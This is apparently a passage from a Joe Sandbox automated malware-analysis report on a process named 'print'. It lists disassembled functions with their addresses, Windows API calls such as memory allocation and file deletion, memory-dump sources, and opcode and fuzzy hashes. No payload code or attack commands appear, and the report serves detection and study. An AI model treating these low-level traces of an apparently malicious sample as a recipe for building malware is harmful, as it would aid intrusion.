                                  Function 004C5110 Relevance: 1.6, APIs: 1, Instructions: 67memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(004B18E8,?,004B1FF9,00000000,00000004,00003000,00000004,00000000,004B1FF9,?,004B18E8,004B1FF9,?), ref: 004C51A9
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 1a67ab1836375b546c2c5e2ab39391adde4e56a3c2c37fd5eb48285c553b542c
                                  • Instruction ID: 02d629dc299daf5a1fcf8a273fc72d3ea2fe81c2e2249a1e9ffeeeb2a5883f98
                                  • Opcode Fuzzy Hash: 1a67ab1836375b546c2c5e2ab39391adde4e56a3c2c37fd5eb48285c553b542c
                                  • Instruction Fuzzy Hash: 6D1116B6200609BBDB14DE99DC81EEB77ADEF89754F00850DFA1897241D634B8128BB5
                                  Function 004C4F60 Relevance: 1.5, APIs: 1, Instructions: 47filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: e83a1e60ced51bf3164f2c9967d0c803f9679a61701b503ed07fc5bc142cd961
                                  • Instruction ID: d2a972aac6c9dea9ca00e74a86bb580b5ef41eec6820744e42d8952e54d440b7
                                  • Opcode Fuzzy Hash: e83a1e60ced51bf3164f2c9967d0c803f9679a61701b503ed07fc5bc142cd961
                                  • Instruction Fuzzy Hash: 4B01AD752016007BD220E66A8C01FAB776CEFC9318F00841EFA1897242D634790187B9
                                  Function 004C4FE0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 004C5017
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_4a0000_print.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 7af6edf71fa789115a6df322c687ea2593d7948ce36acc1e33c1234602a48b09
                                  • Instruction ID: 52335cc793a517bd936f4466570dd24a8086df7b33313d6b394964a8b5e28e8f
                                  • Opcode Fuzzy Hash: 7af6edf71fa789115a6df322c687ea2593d7948ce36acc1e33c1234602a48b09
                                  • Instruction Fuzzy Hash: 3DE04F356006047BD220FA5ACC01FAB776CDBC5754F408419FA4867241CE75B91187F4
                                  Function 02E74340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 0e31fe97e8f6e5179ac03a79477459e1ca552eb1ff42c15d950e03935ac15d1b
                                  • Instruction ID: 32e3ef392246cd0e645b93adb5d14338b3fb55a86cf6a5c5b105b18277555d40
                                  • Opcode Fuzzy Hash: 0e31fe97e8f6e5179ac03a79477459e1ca552eb1ff42c15d950e03935ac15d1b
                                  • Instruction Fuzzy Hash: 41900231645804129580B15848C5547400697E0301B95D051E48A4558C8A248A569361
                                  Function 02E74650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: fe147637d0bad5023d30332fc6b1cf2a353298f6e8c6850ce61abbd061516e9c
                                  • Instruction ID: 46228951cf1429c9cb4b002c633ff36a128d824f80089a519d29984c2f864f3b
                                  • Opcode Fuzzy Hash: fe147637d0bad5023d30332fc6b1cf2a353298f6e8c6850ce61abbd061516e9c
                                  • Instruction Fuzzy Hash: 31900271641504424580B1584845407600697E13013D5D155A49D4564C86288955D269
                                  Function 02E72AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: fe2a46542b31c696b0a6d77df9b142bb0f544820ca5ae4df313610c1cf842666
                                  • Instruction ID: 7a912fb60bbdc89c80216f87790969989a1d9a3565b926bb971580b7335cc259
                                  • Opcode Fuzzy Hash: fe2a46542b31c696b0a6d77df9b142bb0f544820ca5ae4df313610c1cf842666
                                  • Instruction Fuzzy Hash: 93900235261404020585F558064550B044697D63513D5D055F5896594CC63189659321
                                  Function 02E72AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 00faa53d2ac9d1a210d8b7cd240f6e7bb4e64a7a2a8e05fe59c5301165ce99cb
                                  • Instruction ID: 3505a1b53705378d792bed8161618fd8a4a5251be36cfdff2662d5e53e038f71
                                  • Opcode Fuzzy Hash: 00faa53d2ac9d1a210d8b7cd240f6e7bb4e64a7a2a8e05fe59c5301165ce99cb
                                  • Instruction Fuzzy Hash: FA900435351404030545F55C07455070047C7D53513D5D071F54D5554CD731CD71D131
                                  Function 02E72BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6b38f04f06957f53ef6509d2f068825222e3f0c8ab6367677a8518f9924d2a67
                                  • Instruction ID: e3fecaf9e9f873430e0fe29b922661ebc5041590a4a6efeb497f99313c781198
                                  • Opcode Fuzzy Hash: 6b38f04f06957f53ef6509d2f068825222e3f0c8ab6367677a8518f9924d2a67
                                  • Instruction Fuzzy Hash: 0390023124544C42D580B1584445A47001687D0305F95D051A44E4698D96358E55F661
                                  Function 02E72BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cec2e3a60b8ca126a3cd23bc92e802ca1b87715818f3e40473dc430ab7f61201
                                  • Instruction ID: 17833120237f1efd5ba9210ded04b2b77a645a3852ceb9225b864701096c2a6d
                                  • Opcode Fuzzy Hash: cec2e3a60b8ca126a3cd23bc92e802ca1b87715818f3e40473dc430ab7f61201
                                  • Instruction Fuzzy Hash: CE90023124140C02D5C0B158444564B000687D1301FD5D055A44A5658DCA258B59B7A1
                                  Function 02E72BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5e3e940e6960d6c351f492fea34f6822112691dc650c527eeeb93932e96afcd7
                                  • Instruction ID: 99704e71e7916f56457ce48ba5e461f608c64c10e270cf8c919b7be91eb19899
                                  • Opcode Fuzzy Hash: 5e3e940e6960d6c351f492fea34f6822112691dc650c527eeeb93932e96afcd7
                                  • Instruction Fuzzy Hash: 9490023164540C02D590B1584455747000687D0301F95D051A44A4658D87658B55B6A1
                                  Function 02E72B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d7c6cf7c4ec166a72fcf2c08bf7379d9e2dc579b535546d6f8ee88d5c4f0d254
                                  • Instruction ID: 877f14bf23231755c36e84c240eca56d54d4acbab83e05316008c0440b77771c
                                  • Opcode Fuzzy Hash: d7c6cf7c4ec166a72fcf2c08bf7379d9e2dc579b535546d6f8ee88d5c4f0d254
                                  • Instruction Fuzzy Hash: 98900271242404034545B1584455617400B87E0301B95D061E5494594DC5358991A125
                                  Function 02E72EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c919f808b98ee3790bf3e76bf5c50d3e2db60a2df26cb44d1d235810ea332249
                                  • Instruction ID: 42a13f381b9db3553e191e122675199170bf41f7911341f8bc5bb0709b8ae1ee
                                  • Opcode Fuzzy Hash: c919f808b98ee3790bf3e76bf5c50d3e2db60a2df26cb44d1d235810ea332249
                                  • Instruction Fuzzy Hash: ED90027124180803D580B5584845607000687D0302F95D051A64E4559E8A398D51A135
                                  Function 02E72E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bfa9b0d0f1b2f23cd939fc55ea3f6e4bfb60791d37c263485117495c3cc80348
                                  • Instruction ID: ea1c73c9603ff0b066fa7c7f2d6cf7fd071ea66657571e50e74b140cca95986b
                                  • Opcode Fuzzy Hash: bfa9b0d0f1b2f23cd939fc55ea3f6e4bfb60791d37c263485117495c3cc80348
                                  • Instruction Fuzzy Hash: 0A90023164140902D541B1584445617000B87D0341FD5D062A54A4559ECA358A92E131
                                  Function 02E72FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 14fd6b2d0a02cf0f70c4f1f631bc8faadfd28341b934c84450db85049680a92a
                                  • Instruction ID: 32f4956a30ef86e91bd923e267f2288ec572ad6b69c17a3f8448a313ac50ca42
                                  • Opcode Fuzzy Hash: 14fd6b2d0a02cf0f70c4f1f631bc8faadfd28341b934c84450db85049680a92a
                                  • Instruction Fuzzy Hash: A4900231251C0442D640B5684C55B07000687D0303F95D155A45D4558CC92589619521
                                  Function 02E72FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ad8c88d9bd85f9f7db8298d1d551b8fbc80b07e55ea46151b9733518a73f9a71
                                  • Instruction ID: fd34d389f7a954fed81fd4c0d8e4c9e30c0362f8d4158049d4ca80e8f7bfb5d7
                                  • Opcode Fuzzy Hash: ad8c88d9bd85f9f7db8298d1d551b8fbc80b07e55ea46151b9733518a73f9a71
                                  • Instruction Fuzzy Hash: 5C900231641404424580B16888859074006ABE1311795D161A4DD8554D856989659665
                                  Function 02E72F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ce5620094bea95652b6ce8856a9316e54af8a5b8c2c1a8c12da089bce732ae7d
                                  • Instruction ID: 6f8ed8c810d007b3cd7f91f1c90b3ad9472fd707955ef48750f3acf958cba2fc
                                  • Opcode Fuzzy Hash: ce5620094bea95652b6ce8856a9316e54af8a5b8c2c1a8c12da089bce732ae7d
                                  • Instruction Fuzzy Hash: 4690027138140842D540B1584455B070006C7E1301F95D055E54E4558D8629CD52A126
                                  Function 02E72CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c2bb9c3e3954afc2b604e7c456a0a0eba132736ef78082ded0cebbe2a70e358c
                                  • Instruction ID: 525ca0f9c036b41c05c266604e829ca7ad49e93281848cdc6438eac5bba77fea
                                  • Opcode Fuzzy Hash: c2bb9c3e3954afc2b604e7c456a0a0eba132736ef78082ded0cebbe2a70e358c
                                  • Instruction Fuzzy Hash: 7690023124140802D540B5985449647000687E0301F95E051A94A4559EC6758991A131
                                  Function 02E72C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5cd286c10dbada5f919b012723d670bf353e00c8d6d75838670aaf80c988c7d4
                                  • Instruction ID: 96463ea1c6f456fe25634eb9f8b455ccfe88fe111957b245fe7349c0e249db32
                                  • Opcode Fuzzy Hash: 5cd286c10dbada5f919b012723d670bf353e00c8d6d75838670aaf80c988c7d4
                                  • Instruction Fuzzy Hash: 1790023124140C42D540B1584445B47000687E0301F95D056A45A4658D8625C951B521
                                  Function 02E72C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a550bedb60c372ab06ec555d2cabf21798103b0df057e13d51aad7a5d0ca25bf
                                  • Instruction ID: 8dda0f8b76e29c3980ba4c205db6f15a1fdbb22088eb41b084a3338c299f6e4d
                                  • Opcode Fuzzy Hash: a550bedb60c372ab06ec555d2cabf21798103b0df057e13d51aad7a5d0ca25bf
                                  • Instruction Fuzzy Hash: 3F90023124148C02D550B158844574B000687D0301F99D451A88A465CD86A58991B121
                                  Function 02E72DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8946b5e0ee591a2a6b1a6a3ad853fa554afafc4d7713660a3ea63f0546ee3827
                                  • Instruction ID: e7e10466e80d53eb126cf34871d1713f9ea514e3773547997ae8f232cdf02f1d
                                  • Opcode Fuzzy Hash: 8946b5e0ee591a2a6b1a6a3ad853fa554afafc4d7713660a3ea63f0546ee3827
                                  • Instruction Fuzzy Hash: 9E90023124140813D551B1584545707000A87D0341FD5D452A48A455CD96668A52E121
                                  Function 02E72DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: eced3314379da6715fec14317b51772485697d6b52d4ff6646534a0be1e9d35c
                                  • Instruction ID: 79e8646f4a8390e89e5774684902135a953d78d46d44a91ff2e28cb789b8c9b4
                                  • Opcode Fuzzy Hash: eced3314379da6715fec14317b51772485697d6b52d4ff6646534a0be1e9d35c
                                  • Instruction Fuzzy Hash: 98900231282445525985F1584445507400797E03417D5D052A5894954C85369956D621
                                  Function 02E72D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 55dccbd7fc32f5d4659202c3eefdd78a9b9563b9854b3217f94c05090a8761aa
                                  • Instruction ID: 99d337e5690b889a094f55ba1640743d11bb8b788418a7c4ff5cc18f93e9f723
                                  • Opcode Fuzzy Hash: 55dccbd7fc32f5d4659202c3eefdd78a9b9563b9854b3217f94c05090a8761aa
                                  • Instruction Fuzzy Hash: 6890023134140403D580B15854596074006D7E1301F95E051E4894558CD92589569222
                                  Function 02E72D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8b00c8a021999844e8ed0f2ddc3aebb6b8f72eb9a20222f543cf510b9c973e6f
                                  • Instruction ID: a4f71435f55d51a8797371bd426e48d79fc96809d9b1efc9a04734a4f1f4b022
                                  • Opcode Fuzzy Hash: 8b00c8a021999844e8ed0f2ddc3aebb6b8f72eb9a20222f543cf510b9c973e6f
                                  • Instruction Fuzzy Hash: A190023925340402D5C0B158544960B000687D1302FD5E455A449555CCC92589699321
                                  Function 02E735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                  • Associated: 00000010.00000002.4496332350.0000000002F29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_2e00000_print.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3f5689d5568528678ff2772a83c4ae4a8c3050025cba5acf404892c604bd037a
